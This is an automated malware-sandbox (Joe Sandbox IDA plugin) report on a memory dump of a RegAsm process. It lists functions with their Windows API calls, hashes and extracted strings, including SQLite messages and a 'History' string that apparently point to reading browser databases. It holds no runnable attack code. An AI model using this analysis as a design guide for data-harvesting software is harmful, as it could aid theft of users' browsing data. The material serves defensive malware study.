                                                                                                                                                                                                                      • API String ID: 4131324427-0
                                                                                                                                                                                                                      • Opcode ID: ecbd7776f2dd5681e2983066ac375add8e57fbf4011175ff75c0f11db38a490d
                                                                                                                                                                                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecbd7776f2dd5681e2983066ac375add8e57fbf4011175ff75c0f11db38a490d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                                                                                                      • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PathTemp$free
                                                                                                                                                                                                                      • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                      • API String ID: 924794160-1420421710
                                                                                                                                                                                                                      • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                                                                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                      • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                      • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                      • String ID: Error$Error %d: %s
                                                                                                                                                                                                                      • API String ID: 313946961-1552265934
                                                                                                                                                                                                                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                      • API String ID: 0-1953309616
                                                                                                                                                                                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                      • API String ID: 3510742995-272990098
                                                                                                                                                                                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2241099983-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                      • free.MSVCRT ref: 004174E4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4053608372-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1471605966-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                      • String ID: \StringFileInfo\
                                                                                                                                                                                                                      • API String ID: 102104167-2245444037
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memicmpwcslen
                                                                                                                                                                                                                      • String ID: @@@@$History
                                                                                                                                                                                                                      • API String ID: 1872909662-685208920
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                      • String ID: </%s>
                                                                                                                                                                                                                      • API String ID: 3400436232-259020660
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                      • String ID: caption
                                                                                                                                                                                                                      • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                                                                      • API String ID: 210187428-168460110
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                      • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041D8CB
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0041D913
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memcmp
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3384217055-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                                                      • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1889144086-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1661045500-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                      • API String ID: 1297977491-2063813899
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
